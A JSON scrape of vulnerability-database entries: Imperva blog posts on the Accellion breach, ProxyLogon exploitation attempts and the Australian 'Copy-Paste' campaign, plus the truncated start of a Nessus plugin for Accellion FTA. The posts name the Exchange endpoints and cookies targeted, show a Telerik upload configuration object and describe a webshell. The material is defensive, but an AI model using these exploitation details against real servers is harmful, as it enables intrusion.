_\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-12-14T05:44:00", "type": "thn", "title": "US Agencies and FireEye Were Hacked Using SolarWinds Software Backdoor", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0708", "CVE-2019-11510", "CVE-2020-10189", "CVE-2020-1472"], "modified": "2020-12-14T12:54:22", "id": "THN:E9454DED855ABE5718E4612A2A750A98", "href": "https://thehackernews.com/2020/12/us-agencies-and-fireeye-were-hacked.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "impervablog": [{"lastseen": "2021-03-09T20:27:10", "description": "At the end of last year, enterprise firewall company Accellion was the victim of a two-phase [SQL injection attack](<https://www.imperva.com/learn/application-security/sql-injection-sqli/>) that resulted in significant sensitive data breaches over the last number of months. This attack is important for several reasons. It underscores the [rise in frequency](<https://www.identityforce.com/blog/2020-data-breaches>) of incidents leading to public breaches, and highlights SQL injections as an increasingly popular way for attackers to cause major damage. Imperva Research Labs are consistently seeing SQL injection as a [preferred attack](<https://www.imperva.com/blog/despite-covid-19-pandemic-imperva-reports-number-of-vulnerabilities-decreased-in-2020/>) method. More importantly (and frankly, what should scare the pants off everyone), the analysis of this breach confirms that attackers and their methods are becoming more creative and sophisticated. To stop them, organizations need to put greater effort into analyzing and monitoring the data layer. When organizations combine data-centric threat mitigation with protecting all paths to their data, they have a far better posture to stop sophisticated breaches like this in their tracks.\n\n### Learning from the timeline of events\n\nLet\u2019s take a closer look at the details of this attack and explain why understanding how it happened is critical to stopping similar attacks in the future.\n\nIn December 2020, attackers exploited a single zero-day vulnerability in enterprise firewall company Accellion\u2019s File Transfer Appliance (FTA) technology to steal customer data, credit information, and personal data such as birthdates and email addresses subsequently to use as leverage in ongoing extortion attempts.\n\nA post-breach analysis of the attack revealed that the attacker(s) chained together the following vulnerabilities in their content firewall: SQL Injection (CVE-2021-27101) and OS Command Execution (CVE-2021-27104). The attacker leveraged the SQL Injection vulnerability against the file document_root.html to retrieve \u201cW\u201d keys from the Accellion FTA database. Accellion issued a patch to mitigate the vulnerabilities less than 72 hours after discovery.\n\nAfter the December 20, 2020 release of Accellion\u2019s patch, which remediated the vulnerabilities associated with the December exploit, the attacker changed their entry point and employed a new technique involving ServerSide Request Forgery (SSRF) (CVE-2021-27103) and OS Command Execution (CVE-2021-27102). The attacker\u2019s strategy was clear: a two-phase approach with the first targeting vulnerabilities in the content firewall and the second targeting the database where the customer data was held.\n\n### Attack techniques used in the Accellion breach are likely to continue\n\nToday\u2019s cyber attacks are becoming ever more creative, sophisticated and well-funded, in many cases by nation states. As a result, the attackers now have the resources to learn how the software of a target organization works. They have the resources to stay abreast of trends and vulnerabilities, increasing their capacity to make more sophisticated attacks. To get the highest return on their investment, attackers and their sponsors choose organizations whose applications and appliances are widely used and trusted by thousands of customers, like Accellion\u2019s FTA.\n\nAs in the 2020 [SolarWinds breach](<https://www.imperva.com/blog/2020-ends-with-a-bang/>), the attackers didn\u2019t just exploit vulnerabilities to compromise a target system, they were knowledgeable enough to run a clean-up routine to erase evidence of the activity. In the Accellion case, the attackers took the time to reverse-engineer their target\u2019s software and figure out the best way to breach their content firewall. When Accellion shut down that path, they already had a plan to attack the database itself. Attacking a company like Accellion that facilitates secure file transfers is particularly brazen. Irony notwithstanding, it makes sense. Accellion enterprise customers using secure file transfers are very likely to be moving around the exact data that an attacker wants to steal. In the end, the attackers were also able to weaponize the data and use it for global extortion attempts that are [likely to continue](<https://www.wired.com/story/accellion-breach-victims-extortion/>) for many months.\n\n### An optimal data security posture thwarts these new breeds of attacks\n\nThe Accellion breach started with a SQL injection attack. Just using SQL injection, the attackers managed to complete a successful attack. This illustrates very clearly the absolute need to do analytics and threat detection at the data layer. The lowest common denominator in all applications is the data repository layer - all apps and all systems store data somewhere. Most applications use a database although in today\u2019s modern architecture landscape many things can and should be classified as a database even if technically they are not a DBMS. At the end of the day, you can discover almost any attack just by looking at the data layer because every application has a data component.\n\nGoing back to the [Imperva Research Lab\u2019s data](<https://www.imperva.com/blog/despite-covid-19-pandemic-imperva-reports-number-of-vulnerabilities-decreased-in-2020/>) and seeing the chronic and persistent frequency with which SQL injection results in attacks, it seems that organizations still are not paying enough attention to securing the data layer. In the SolarWinds case, as well as this Accellion breach, monitoring at the data level with machine learning model-driven [behavior analytics](<https://www.imperva.com/learn/data-security/ueba-user-and-entity-behavior-analytics/>) and [automated detection](<https://www.imperva.com/products/data-risk-analytics/>) of non-compliant, risky, or malicious data access behavior would have brought up-front attention to these attacks.\n\nThe other thing we learn from the Accellion breach is that one must protect all paths to the data. When the content firewall protection fails, you must have internal protection in place to stop attacks. In the Accellion case, they only fixed a part of the problem after the first breach. They mitigated the first vulnerability - but most of the attack itself stayed the same when the attacker launched the second phase of the breach. The attackers changed only the entry point until they gained the ability to run an OS command. From there, the rest of the attack followed the pattern of the first, they only had to find a different first step. This highlights the critical importance for organizations to secure all access points as a matter of course. Imperva is dedicated not only to securing data, but securing all paths to the data. Imperva helps organizations take a holistic approach to security and execute both application monitoring and database monitoring.\n\nThe post [Protecting Your Data from Cyber Extortion: Lessons from the Latest Mega-hack](<https://www.imperva.com/blog/the-latest-multistage-attacks-demonstrate-the-need-to-secure-the-data-layer/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-09T19:39:36", "type": "impervablog", "title": "Protecting Your Data from Cyber Extortion: Lessons from the Latest Mega-hack", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-03-09T19:39:36", "id": "IMPERVABLOG:9DE0CE48F84BCF9764A6FA0372DB2AD1", "href": "https://www.imperva.com/blog/the-latest-multistage-attacks-demonstrate-the-need-to-secure-the-data-layer/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-29T14:27:27", "description": "### Introduction\n\nOn 2 March 2021, [Microsoft](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) and [Veloxity](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>) produced disclosures outlining the discovery of four zero day vulnerabilities affecting multiple versions of Microsoft Exchange Server. Each of the vulnerabilities have been attributed a severity rating from high to critical, however the most impactful statement from both Microsoft and Veloxity was that these vulnerabilities formed an attack chain which was being actively exploited in the wild.\n\nSince the publication of these disclosures, details have emerged regarding the observed source of the exploitation of these vulnerabilities. The attacks are being widely attributed to the state-sponsored group dubbed Hafnium, [alleged](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) to be operating out of China.\n\nThe most notable of the new CVEs, [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>), is a SSRF vulnerability in Microsoft Exchange which allows an attacker to induce the server into performing \u201cunintended actions\u201d through the use of a series of specially crafted POST requests. The attacker can leverage this vulnerability to exploit the other CVEs to perform malicious actions, such as dump private email, or even achieve remote code execution.\n\nImperva has put dedicated security rules in place to protect our customers in a direct response to the initial disclosures. Imperva has also performed analysis on the attempted exploitation of these CVEs and we have produced the following insights.\n\n### Observations and Statistics\n\nSince the 2 March disclosures, Imperva has observed over **44k** scanning and exploitation attempt sessions in the wild from over **1,600** unique source IPs, related to the Microsoft Exchange [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>) SSRF. From this data, we have been able to identify the most targeted industries and countries which have been affected by the vulnerability in the aftermath of the disclosures.\n\n### Targeted Industries\n\nOne of the key observations we have made is that this vulnerability has impacted almost every category of industry, this observation is explained by how ubiquitous the use of Microsoft Exchange is across all sectors. According to our data, the Computing & IT sector was the most targeted industry, with 21% of all targeted sites belonging to this category. Next was Financial Services with 18%, and Telecoms and ISPs completed the top 3 with 10.5%. Below we show the breakdown of scanning and exploitation attempts against various industries.\n\n### Targeted Countries\n\nImperva observed both scanning and exploitation attempts against sites worldwide, with the US being the most targeted country, with the UK and Singapore a distant second and third, respectively.\n\n### Source Countries\n\nImperva observed that since the disclosures, relatively few scanning and exploitation attempts have been made from Chinese sources. This could be because exploitation, and to a greater extent, scanning has shifted to the wider public. It may also be because the attackers are using proxies to carry out the attacks. The chart below shows the top attacking countries by session count observed by Imperva analysts since the disclosures.\n\n### Attacker IP Reputation\n\nImperva\u2019s IP reputation allows for the identification of potentially suspicious or malicious behaviour by means of tagging relevant IPs. From this data, **42.3%** of the attacker source IPs were previously tagged by Imperva as having exhibited malicious behaviour and **8.45%** of the attacker source IPs were previously tagged by Imperva as being identified as vulnerability scanners.\n\n### Observed Attacker Activity\n\nImperva analysts have observed various indicators of the attempted exploitation of the Microsoft Exchange Hafnium [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>) in the wild, indicating various motives on the part of the attackers. As mentioned previously, an attacker can leverage the vulnerability to perform various unauthorized actions, including the collection of private information, and even the writing of arbitrary files to the server resulting in remote code execution. In this section, we will discuss some of the requests we have observed and the perceived intentions and motivation of the attackers.\n\nDetailed descriptions of how the exploit chain works, and how it can be exploited are available at various different sources [[1](<https://testbnull.medium.com/ph%C3%A2n-t%C3%ADch-l%E1%BB%97-h%E1%BB%95ng-proxylogon-mail-exchange-rce-s%E1%BB%B1-k%E1%BA%BFt-h%E1%BB%A3p-ho%C3%A0n-h%E1%BA%A3o-cve-2021-26855-37f4b6e06265>)][[2](<https://www.praetorian.com/blog/reproducing-proxylogon-exploit/>)], however the important thing to understand is that the vulnerability allows an attacker to send malicious requests to various backend components in Microsoft Exchange by means of a specially crafted POST request to either the Outlook Web Application or the Exchange Admin Centre, where the \u201cX-BEResource\u201d and \u201cX-AnonResource-Backend" cookie values can be manipulated to specify the targeted resource. In our investigation following the disclosures we have observed the following in our data.\n\n### Crafted requests to /EWS/Exchange.asmx\n\nA common exploit request observed by Imperva attempting to exploit the CVE-2021-26855 SSRF vulnerability was a POST request to Exchange Admin Centre (/ecp/) and Outlook Web Application endpoints (/owa/) endpoint, with the crafted cookie value endpoints set to the Exchange Web Services endpoint \u201c/EWS/Exchange.asmx\u201d. This allows the attacker to gain authenticated access to private mail on the server. This request accounted for **18%** of exploitation attempts observed.\n\n### Crafted requests to /autodiscover/autodiscover.xml\n\nThe most common exploitation attempt of the SSRF observed by Imperva analysts were requests to the Exchange Admin Centre endpoint (/ecp), with the vulnerabile cookie set with the FQDN of the server, and the endpoint of /autodiscover/autodiscover.xml.\n\nAutodiscover in Exchange is a service which allows for the rapid collection of Exchange configurations, service URLs and supported protocols, therefore it makes an obvious target for attackers who are attempting to quickly gather information, escalate privileges and maintain persistence. In the case of this vulnerability the autodiscover service could be used to gather the information required for further exploitation of the other CVEs associated with the chain. This request accounted for **51%** of exploitation attempts observed.\n\n### Crafted requests to /mapi/emsmdb\n\nAnother pattern Imperva analysts observed were crafted POST requests to the Exchange Admin Centre (/ecp), with the cookie value crafted with the **/mapi/emsmdb** endpoint.\n\nResearch into the published exploits and disclosures indicate that the \u201c/mapi/emsmdb\u201d endpoint can be abused to procure a valid SID, which can then allow the attacker to gain privileges to the Exchange \u201c**proxyLogin.ecp**\u201d endpoint (Exchange HTTP proxy), which can in turn be used to obtain a valid \u201c**ASP.NET_SessionID**\u201d and \u201c**msExchEcpCanary**\u201d values which are required for further chained exploitation of MS exchange. This request accounted for **3%** of exploitation attempts observed.\n\n### How Imperva protects you\n\nImperva has implemented rules in [Cloud WAF](<https://www.imperva.com/products/web-application-firewall-waf/>) and [On Prem WAF](<https://www.imperva.com/products/web-application-firewall-waf/>), which are effective against all exploitation of CVE-2021-26855. These rules are also effective against the chained exploitation of the subsequent CVEs: [CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>), [CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>) and [CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>).\n\n### Check if you have been compromised\n\nSince the disclosures of these zero day vulnerabilities, various news articles have been published reporting mass exploitation [[1](<https://www.bbc.com/news/technology-56372188>)][[2](<https://www.zdnet.com/article/microsoft-exchange-server-zero-day-attacks-malicious-software-found-on-2300-machines-in-uk/>)]. We recommend that if you have unpatched exchange servers in your organization, you apply the latest patches from Microsoft as soon as possible, and use the following [guide](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>) from Microsoft to check for any indicators of compromise.\n\nThe post [Imperva Observes Hive of Activity Following Hafnium Microsoft Exchange Disclosures](<https://www.imperva.com/blog/imperva-observes-hive-of-activity-following-hafnium-microsoft-exchange-disclosures/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-26T15:06:38", "type": "impervablog", "title": "Imperva Observes Hive of Activity Following Hafnium Microsoft Exchange Disclosures", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-26T15:06:38", "id": "IMPERVABLOG:7B28F00C5CD12AC5314EB23EAE40413B", "href": "https://www.imperva.com/blog/imperva-observes-hive-of-activity-following-hafnium-microsoft-exchange-disclosures/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-08-07T08:03:43", "description": "On June 18, 2020, the Australian Cyber Security Centre (ACSC) released a disclosure detailing a \u2018sophisticated\u2019 and sustained attack against Australian government bodies and companies. The disclosure was covered by several mainstream media outlets including the [BBC](<https://www.bbc.com/news/world-australia-46096768>), and the [Guardian](<https://www.theguardian.com/australia-news/2020/jun/19/australia-cyber-attack-attacks-hack-state-based-actor-says-australian-prime-minister-scott-morrison>).\n\nThe following day, the Australian prime minister made a [statement](<https://www.pm.gov.au/media/statement-malicious-cyber-activity-against-australian-networks>) about the attacks in which, although he declined to attribute the attacks to a specific threat actor, he suggested that it was \u2018state based\u2019. According to the BBC the prime minister also stressed that the attacks were not limited only to Australia, but affected targets worldwide.\n\nSeveral exploits and indicators of compromise were outlined in the ACSC\u2019s disclosure, including initial access vectors, execution techniques, malware, and persistence techniques. These were all evaluated by our analysts to ensure that, where possible, the Imperva Cloud WAF could mitigate attempts to utilise such vectors. Naturally, some of these items fall outside of the scope of what a WAF is expected to mitigate, such as spear phishing attacks. However, in many instances, the wide-ranging capabilities of Imperva Cloud WAF allows for effective mitigation of the exploits and techniques leveraged in the campaign. In this blog post, we\u2019ll explore some of these exploits and techniques and how Imperva Cloud WAF can mitigate against them.\n\n### The Access Vectors\n\nThe ACSC identified several initial access vectors during the campaign, all of which are detailed [here](<https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf>). Let\u2019s take a brief look at a few of these vectors, and the mitigation provided by the Imperva Cloud WAF.\n\n### Telerik UI CVE-2019-18935\n\nCVE-2019-18935 is a vulnerability discovered in 2019 by researchers at [Bishop Fox](<https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui>), in the RadAsyncUpload file handler in Telerik UI for ASP.net AJAX, a commonly-used suite of web application UI components. The vulnerability is brought about by the [insecure deserialization](<https://www.imperva.com/blog/deserialization-attacks-surge-motivated-by-illegal-crypto-mining/>) of JSON objects, which can lead to remote code execution on the host.\n\nIn order to successfully exploit the insecure deserialization vulnerability identified in CVE-2019-18935, the attacker must also exploit a pre-existing file upload vulnerability, CVE-2017-11317, which identifies the use of a default encryption key to encrypt the data in file upload requests. With this knowledge, an attacker can use the key to modify the \u201cTempTargetFolder\u201d variable in the upload request, essentially allowing file uploads to anywhere in the file system the web server has write permissions to.\n\nThe more recent vulnerability, CVE-2019-18935, details the anatomy of the upload request from RadAsyncUpload, in which the rauPostData parameter contains both a serialized configuration object, and the object\u2019s type.\n\nShown below is the HTTP POST request containing the encrypted rauPostData parameter. The part of the parameter before the \u201c&\u201d, highlighted in blue is the serialized configuration object, and the part after, highlighted in yellow is the object's defined type.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/07/Telerik-Request.jpg>)\n\nWhen decrypted the configuration object resembles the following:\n \n \n {\n \"TargetFolder\":\"jgas0meSrU/uP/TPzrhDTw==Au0LOaX6ddHOqJL5T8IwoKpc0rwIVPUB/dtjhNpis+s=\",\n \"TempTargetFolder\":\"5wWbvXpnoGw9mTa6QfX46Myim0SoKqJw/9EHc5hWUV4=fkWs4vRRUA8PKwu+jP0J2GwFcymt637TiHk3kmHvRM4=\",\n \"MaxFileSize\":0,\n \"TimeToLive\":{\n \"Ticks\":1440000000000,\n \"Days\":0,\n \"Hours\":40,\n \"Minutes\":0,\n \"Seconds\":0,\n \"Milliseconds\":0,\n \"TotalDays\":1.6666666666666665,\n \"TotalHours\":40,\n \"TotalMinutes\":2400,\n \"TotalSeconds\":144000,\n \"TotalMilliseconds\":144000000\n },\n \"UseApplicationPoolImpersonation\":false\n }\n \n\nAnd the type resembles:\n\n` \nTelerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version=2017.1.228, Culture=neutral, PublicKeyToken=121fae78165ba3d4 \n`\n\nIt was discovered that, if the attacker could modify the specified type to be a gadget - a class inside the scope of execution of the application - in a subsequent request, they could achieve remote code execution on the server.\n\nAnalysts at Imperva were able to take the proof of concept code provided, and reproduce the requests made. From here they were able to create cloud WAF rules to distinguish between legitimate traffic from the RadAsyncUpload file handler, and the malicious requests from the PoC code.\n\n**Statistics and observations:**\n\nThroughout June, we observed the attack pattern matching that of an exploit of CVE-2019-18935 on 645 occasions. The following chart shows the top targeted countries during that period.\n\n### Exploitation of Citrix Products CVE-2019-19781\n\nThe vulnerability in Citrix products CVE-2019-19781 was disclosed in a bulletin released by Citrix back in December 2019. Although no proof of concept or exploit was released at the time, it was said to potentially result in remote code execution and was presumed to take advantage of a directory traversal flaw in the application. We\u2019ve already released a blog post covering our mitigation of this vulnerability [here](<https://www.imperva.com/blog/imperva-mitigates-exploits-of-citrix-vulnerability-right-out-of-the-box/>).\n\n**Statistics and observations:**\n\nDuring the month of June we\u2019ve seen the rule put in place for this vulnerability by Imperva Cloud WAF triggered 155,050 times. The following chart shows the top targeted countries during that period.\n\n### Persistence Techniques\n\nThe ACSC identified several different persistence techniques used during the campaign. Among these were several webshells which allowed the attacker to interact with the compromised systems after achieving initial access.\n\nA webshell is a script or piece of code which runs on a web server and allows for administrative actions to be performed remotely. Often these serve legitimate purposes, although uploading of webshells is common practice for attackers seeking to maintain persistence after initially compromising a server. These webshells are commonly referred to as backdoors.\n\n**Imperva\u2019s backdoor protection**\n\nBackdoor protection, which forms a part of the Imperva Cloud WAF, is capable of both detection and mitigation of webshells uploaded to compromised servers to act as backdoors. When certain conditions are met, the Cloud WAF proxies inspect the response from the server, from which they can identify known webshells, and block the subsequent requests thereafter.\n\nYou can read more about Imperva\u2019s backdoor protection [here](<https://www.imperva.com/blog/the-trickster-hackers-backdoor-obfuscation-and-evasion-techniques/>)\n\n**Webshells observed in the campaign**\n\nIn its disclosure, the ACSC provided a [list of webshells](<https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises-Web-Shell-Source.txt>) observed during the attack campaign. In each instance, the source code for the webshell was provided, XOR\u2019d, and base64 encoded to prevent \u2018accidental mishandling\u2019 of the code. We\u2019ll look briefly at two of these webshells and outline how Imperva\u2019s Backdoor Protection effectively mitigates them. Shown below is the Awen webshell source code in its encoded form.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/07/image6.png>)\n\n### Awen asp.net webshell\n\nThis is a simple, open source asp.net webshell outlined by the ACSC in its disclosure. It creates a simple HTML form which receives a string as input, and provides it as an argument to cmdexe. Shown below is the Awen webshell running in our sandbox environment, after executing the \u201csysteminfo\u201d command.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/07/image1-1.png>)\n\nAnalysts at Imperva were then able to decode the source code of both the webshells discussed, execute that code on a sandbox environment, and gather enough info to craft signatures to detect the webshells in the wild. Although neither of these webshells have been observed in the wild by Imperva at this time, we will be monitoring the traffic detected by these signatures closely in the coming weeks.\n\nFrom even a brief look at the details provided about the recent Australian Cyber attack, a lot can be learned about the techniques used by threat actors, and many conclusions can be drawn. Among the most significant is that even advanced \u201cstate based\u201d actors will make use of readily available exploits and attack code. Although the [mitigation recommendations from the ACSC](<https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2020-008-copy-paste-compromises-tactics-techniques-and-procedures-used-target-multiple-australian-networks>) are well advised, the use of a well configured WAF can serve as an extra layer of protection. This is where the deployment of the Imperva WAF could make all the difference to your business.\n\nThe post [Australian Cyber Attack Vectors Blocked Out of the Box by Imperva WAF](<https://www.imperva.com/blog/australian-cyber-attack-vectors-blocked-out-of-the-box-by-imperva-cloud-waf/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-07-06T15:01:00", "type": "impervablog", "title": "Australian Cyber Attack Vectors Blocked Out of the Box by Imperva WAF", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317", "CVE-2019-18935", "CVE-2019-19781"], "modified": "2020-07-06T15:01:00", "id": "IMPERVABLOG:BB987E93C1A58280077D98CF497FD72D", "href": "https://www.imperva.com/blog/australian-cyber-attack-vectors-blocked-out-of-the-box-by-imperva-cloud-waf/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2022-06-15T18:11:45", "description": "The version of the remote Accellion Secure File Transfer Appliance is prior to 9_12_416. It is, therefore, affected by multiple vulnerabilities:\n\n - SQL injection via a crafted Host header in a request to an endpoint. (CVE-2021-27101)\n\n - OS command execution via a local web service call. (CVE-2021-27102)\n\n - SSRF via a crafted POST request to an endpoint. (CVE-2021-27103)\n\n - OS command execution via a crafted POST request to various admin endpoints. (CVE-2021-27104)\n\nAlso, Accellion File Transfer Appliance is no longer supported by the vendor.\nLack of support implies that no new security patches for the product will be released by the vendor. As a result, it is likely to contain other security vulnerabilities.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-11-05T00:00:00", "type": "nessus", "title": "Accellion File Transfer Appliance < 9_12_416 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2022-01-20T00:00:00", "cpe": ["cpe:/h:accellion:secure_file_transfer_appliance"], "id": "ACCELLION_FTA_9_12_380.NASL", "href": "https://www.tenable.com/plugins/nessus/154933", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154933);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/20\");\n\n script_cve_id(\n \"CVE-2021-27101\",\n \"CVE-2021-27102\",\n \"CVE-2021-27103\",\n \"CVE-2021-27104\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Accellion File Transfer Appliance < 9_12_416 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of the remote Accellion Secure File Transfer Appliance is prior to 9_12_416. It is, therefore, \naffected by multiple vulnerabilities:\n\n - SQL injection via a crafted Host header in a request to an endpoint. (CVE-2021-27101)\n\n - OS command execution via a local web service call. (CVE-2021-27102)\n\n - SSRF via a crafted POST request to an endpoint. (CVE-2021-27103)\n\n - OS command execution via a crafted POST request to various admin endpoints. (CVE-2021-27104)\n\nAlso, Accellion File Transfer Appliance is no longer supported by the vendor.\nLack of support implies that no new security patches for the product will be released by the vendor. \nAs a result, it is likely to contain other security vulnerabilities.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/accellion/CVEs\");\n # https://www.accellion.com/sites/default/files/resources/fta-eol.pdf\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c6f8410d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update to version 9_12_416 or later, or \n upgrade to a more secure platform, kiteworks that is currently supported.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-27104\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/02/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/05\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:accellion:secure_file_transfer_appliance\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n 